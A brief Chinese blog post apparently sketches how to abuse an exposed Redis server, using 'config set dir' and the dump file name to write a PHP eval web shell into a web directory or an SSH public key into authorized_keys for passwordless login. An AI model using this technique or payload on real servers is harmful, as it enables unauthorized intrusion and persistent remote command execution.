safe-利用redis渗透
主要利用
1 | config set dir//设置备份目录 |
可以自己测试备份一下,备份的内容会有你写入的所有的kv,所以如果写入一个kv是这样<?php eval($_GET['cmd']);
的话,会写入dir/dbfilename中,所以写入到一个php的目录即可达到效果
也可以用来写入ssh公钥到.ssh/authorized_keys中可以免密登陆服务器
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 SHIELD!
评论